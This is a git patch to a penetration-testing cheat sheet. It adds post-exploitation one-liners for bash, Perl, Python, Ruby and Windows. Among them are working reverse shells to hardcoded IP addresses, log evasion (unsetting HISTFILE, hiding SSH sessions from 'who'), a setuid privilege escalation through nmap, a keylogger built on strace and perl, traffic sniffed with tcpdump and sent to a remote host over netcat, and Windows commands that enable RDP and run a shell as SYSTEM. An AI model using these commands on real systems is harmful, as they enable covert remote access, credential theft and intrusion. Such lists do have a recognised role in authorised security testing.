From 5a3b92ae4ca5892fdad5f2c0d5b7576d5b0a8484 Mon Sep 17 00:00:00 2001
From: "tekwizz123@gmail.com"
Date: Tue, 17 Dec 2013 20:22:00 +0000
Subject: [PATCH] Added one liners from @pentestcliX
---
 scripting/bash.md | 82 ++++++++++++++++++++++++++++++++++++++++++++
 scripting/perl.md | 8 ++++-
 scripting/python.md | 6 +++-
 scripting/ruby.md | 8 ++++-
 scripting/windows.md | 16 +++++++++
 5 files changed, 117 insertions(+), 3 deletions(-)
 create mode 100644 scripting/bash.md
 create mode 100644 scripting/windows.md
diff --git a/scripting/bash.md b/scripting/bash.md
new file mode 100644
index 0000000..9560168
--- /dev/null
+++ b/scripting/bash.md
@@ -0,0 +1,82 @@
+# Bash Commands for Post Exploitation
+
+One liners
+-----------
+
+**Resolve a list of hostnames to IP addresses**
+```bash
+awk < hostnames.txt '{ system("resolveip -s " $1) }'```
+
+**IIS 6.0 IP Disclosure**
+```bash
+curl -l -O -H "Host:" "example.com"```
+
+**Connect to SSL websites**
+```bash
+openssl s_client -connect example.com:443```
+
+**Convert base64 to text**
+```bash
+echo 'base64string' | base64 -d (Use -D on OSX)```
+
+**Decode ASCII shellcode**
+```bash
+echo -e *shellcode hex string* (may need to use -i to ignore bad chars)```
+
+**Enumerate DNS of Class C**
+```bash
+for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done```
+
+**SSH to box and hide from "who" and "lastlog"**
+```bash
+ssh andrew@10.1.1.1 -T /bin/bash```
+
+**Prevent terminal logging**
+```bash
+unset HISTFILE```
+
+**Add immutable attribute to a unix file**
+```bash
+chattr +i *file*```
+
+**SSH into host2 through host1**
+```bash
+ssh -o "proxycommand ssh -W host2 host1" host2```
+
+**Nmap setuid privesc**
+```bash
+nmap --script <(echo 'os.execute("/bin/sh")')
+nmap --interactive (for older versions)```
+
+**Transfer files through SSH**
+```bash
+ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz```
+
+**Internal port redirect for bypassing services**
+```bash
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444```
+
+**Enable forwarding on the fly**
+```bash
+sysctl -w net.ipv4.ip_forward=1```
+
+**Kill with USR1 developer defined signal**
+```bash
+kill -USR1 ```
+
+**Pull IP addresses from a file**
+```bash
+grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'```
+
+**Sniff traffic with tcpdump and send to remote tcp socket**
+```bash
+tcpdump -w - | nc -v 8.8.8.8 9999```
+
+**Recursively search for files within a directory**
+```bash
+zcat -rf ./* | grep "searchstring"
+
+Credits
+-----------
+Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions
+
diff --git a/scripting/perl.md b/scripting/perl.md
index 4328430..bc6bd83 100644
--- a/scripting/perl.md
+++ b/scripting/perl.md
@@ -2,4 +2,10 @@
 **Perl reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
-```perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'```
+```perl
+perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'```
+
+**Running proc keylogger**
+```perl
+strace -p $PID -f -eread -o '| perl -ne'\"BEGIN{$|=1}my($i)=/\(0,"([^"]*)"/;print$i'\'```
+
diff --git a/scripting/python.md b/scripting/python.md
index bc21def..f801d7e 100644
--- a/scripting/python.md
+++ b/scripting/python.md
@@ -17,4 +17,8 @@ python -c "import socket,subprocess,os;host=\"[YOURIP]\";port=9000;s=socket.sock
 **Spawn bash shell prompt**
 ```python
-python -c 'import pty; pty.spawn("/bin/bash")'```
\ No newline at end of file
+python -c 'import pty; pty.spawn("/bin/bash")'```
+
+***Print all ASCII characters***
+```python
+python -c 'import string; print string.printable'```
diff --git a/scripting/ruby.md b/scripting/ruby.md
index 5e8a5b8..142d88f 100644
--- a/scripting/ruby.md
+++ b/scripting/ruby.md
@@ -9,4 +9,10 @@ ruby -run -e httpd -- -p 8001 .```
 **Reverse /bin/sh shell on port 443 from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
 ```ruby
-ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'```
\ No newline at end of file
+ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'```
+
+***URL Encode***
+```ruby
+ruby -e 'require "open-uri"; result = URI.escape(YOUR STRING HERE, Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))'```
+
+
diff --git a/scripting/windows.md b/scripting/windows.md
new file mode 100644
index 0000000..571e2c3
--- /dev/null
+++ b/scripting/windows.md
@@ -0,0 +1,16 @@
+# Windows Commands for Post Exploitation
+
+One liners
+-----------
+**Tunnel traffic natively with windows**
+```bash
+netsh int portproxy v4tov4 listenport=80 connecthost=10.0.0.1 connectport=80
+
+**Launch cmd.exe as local system w/ psexec**
+psexec -s cmd.exe
+
+**Enable rdp with CLI**
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+
+**Launch ARP scan**
+for /L %i in (1,1,255) do @start /b ping -n 1 -w 1 192.168.1.%i